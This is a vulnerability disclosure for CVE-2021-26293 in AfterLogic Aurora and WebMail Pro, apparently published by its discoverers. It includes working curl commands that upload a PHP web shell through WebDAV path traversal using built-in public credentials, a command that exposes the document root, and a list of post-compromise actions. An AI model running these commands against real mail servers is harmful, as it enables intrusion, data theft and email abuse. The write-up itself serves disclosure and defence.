Skip to content

Latest commit

 

History

History
78 lines (52 loc) · 4.72 KB

CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md

File metadata and controls

78 lines (52 loc) · 4.72 KB

CVE-2021-26293 - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function

Gained Access: WebServer user ( Apache, Nginx, Etc… )

Resources:

Authors:

  • Emre KELEŞ - @emrekeles on twitter Twitter URL
  • Emircan YILDIZ - @scorpsec on twitter Twitter URL
  • Halil Emre ÖZEN - @halilemreozen on twitter Twitter URL

Report Summary:

AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP PUT request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to create/overwrite files with malicious files such as web shells or database dumpers, etc.

After uploading a malicious PHP file to the web server, some example actions that the attacker can do;

  1. Download / Modify the database
    1. Email addresses with easily decodable passwords
    2. CalDAV data ( Calendars of the users )
    3. CardDAV data ( Contacts of the users )
  2. Download user uploaded private WebDAV files.
  3. Intercept to read/modify emails of webmail users.
    1. A way to read emails because webmail servers usually are whitelisted on mail servers while normal clients have thresholds
    2. A good way to spread malicious executables/mails to users without struggling mail gateways/spam blockers.
    3. Acting like the real user and sending vicious emails to important users/companies
    4. Sending bulk emails for spam campaigns.
  4. Try to privilege escalation to get the root/administrator server.

Etc...

To Reproduce:

Upload the malicious file with the following curl command

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

As the AfterLogic WebMail Pro docs mentioned “the web root usually looks like /var/www/html” and at the above PoC assumes files are located under apache’s standard /var/www/html path, it may differ due to configuration but it’s not a block for the attacker because we realized that some of the EndPoints expose the document root path when the invalid path parameter requested.

Ways to figure out document root directory on customized web server configurations;

  1. Using invalid path to get SabreDAV error which gives full path disclosure of the path to the webroot.
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
  1. Trying to common web server paths
  2. Brute force ( append new ../ to the URL, until getting HTTP 200 for the uploaded malicious file. )

Technical Description:

  • dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
  • \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
  • \libraries\Sabre\DAV\server.php -> invokeMethod
  • \libraries\Sabre\DAV\server.php -> httpPut
  • \libraries\Sabre\DAV\FS\File.php -> put

Unrestricted Upload of File with Dangerous Type, Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension which with that way attacker able to write upper directories and execute the malicious file

With the above problem any loggable user can uploads malicious files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.